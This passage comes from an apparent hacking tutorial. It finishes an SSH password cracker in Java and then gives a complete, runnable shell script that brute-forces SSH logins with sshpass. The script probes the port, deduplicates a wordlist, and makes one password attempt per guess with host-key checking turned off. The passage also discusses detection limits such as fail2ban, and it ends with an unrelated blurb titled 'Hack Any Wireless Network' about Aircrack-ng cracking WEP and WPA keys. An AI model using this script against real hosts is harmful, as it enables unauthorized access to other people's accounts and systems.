There we have it, our SSH password cracker is complete! Now we move on to the final step.

Step 7: Testing it Out

Before we end our session today, we’re going to test out our new password cracker. I have a simple server set up on my local network running OpenSSH server. So let’s crack this password!
First, we need to compile our Java code into a class file that we can execute:
We can see here that we need to use the -cp flag to force the JSch package to be used in the compilation. Then, we execute the program while again forcing it to use the JSch package. Now that we have our program compiled, we need a wordlist to use. Let’s make a simple wordlist now:
Nothing really special here, just using some commands to make a very small wordlist. Now that we have a wordlist, we can use it to crack the SSH password:
We then execute the program again (forcing the JSch package) and pass all our arguments. We see the functions executing before our eyes for a minute before it returns that the credentials were found. We successfully cracked an SSH password!
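The Java listings in this post were screenshots and are not reproduced here. As an added example, and not the post’s own program, the same four pieces (port check, wordlist reader, single login attempt, cracking loop) are shown below in shell, using sshpass to supply each password to the OpenSSH client. It assumes the OpenSSH client, sshpass, bash (only for the port probe) and coreutils timeout are installed; host, port, user and wordlist come from the command line.

```shell
#!/bin/sh
# Added example, not the post's Java program: the same tool in shell, with
# sshpass making the password attempts. Assumes the OpenSSH client, sshpass,
# bash (for the port probe) and coreutils timeout are installed; host, port,
# user and wordlist are supplied on the command line.

# Step 3 equivalent: is the port open? A TCP connect with a 5 s timeout.
check_host() {
    timeout 5 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Step 4 equivalent: read the wordlist, dropping blank lines and duplicates
# while keeping the original order, so each candidate costs one connection.
read_wordlist() {
    awk 'NF && !seen[$0]++' "$1"
}

# Step 5 equivalent: one login attempt. Password authentication only, no
# host-key prompt, no keys or agent, a single prompt, and stdin from
# /dev/null (-n) so ssh cannot swallow the rest of the wordlist feeding the
# loop. Returns 0 on a successful login, non-zero otherwise.
# Usage: try_password HOST PORT USER PASSWORD
try_password() {
    SSHPASS=$4 sshpass -e ssh -n -p "$2" \
        -o PreferredAuthentications=password -o PubkeyAuthentication=no \
        -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
        -o NumberOfPasswordPrompts=1 -o ConnectTimeout=5 \
        "$3@$1" true >/dev/null 2>&1
}

# Step 6 equivalent: walk the list and stop at the first hit.
# Usage: crack HOST PORT USER WORDLIST
# Prints "user:password" and returns 0 on success, 1 if the list runs out,
# 2 if the port is closed.
crack() {
    host=$1; port=$2; user=$3; list=$4
    check_host "$host" "$port" || { echo "$host:$port is closed" >&2; return 2; }
    echo "cracking $user@$host:$port with $(read_wordlist "$list" | grep -c .) candidates"
    read_wordlist "$list" | {
        while IFS= read -r pw; do
            if try_password "$host" "$port" "$user" "$pw"; then
                echo "$user:$pw"
                exit 0      # ends the pipeline subshell, not the script
            fi
        done
        exit 1
    }
}

# Usage: sh sshbrute.sh run HOST PORT USER WORDLIST
if [ "${1:-}" = "run" ]; then
    crack "$2" "$3" "$4" "$5"
fi
```

One connection per guess is slow and very visible: each failure is a line in the target’s auth log, and fail2ban or sshd’s own MaxAuthTries and MaxStartups limits will throttle or ban the attacker’s address long before a large wordlist is exhausted. That is the same trade-off the Java version makes; the point of writing it yourself is to understand exactly which option makes a failure mean “wrong password” rather than “hung on a prompt”.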

Hack Any Wireless Network With AirCrack-Ng

Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. For WEP it implements the standard FMS attack along with some optimizations like the KoreK attacks, as well as the newer PTW attack, which makes it much faster than other WEP cracking tools; WPA-PSK keys cannot be recovered statistically and are only found by a dictionary attack against a captured four-way handshake. In fact, Aircrack-ng is a suite of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:

  • Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
  • More cards/drivers supported
  • More OS and platforms supported
  • New WEP attack: PTW
  • WEP dictionary attack
  • Fragmentation attack
  • Improved cracking speed
  • Capture with multiple cards
  • New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriver-ng, airbase-ng, tkiptun-ng and airdecloak-ng
  • Optimizations, other improvements and bug fixing

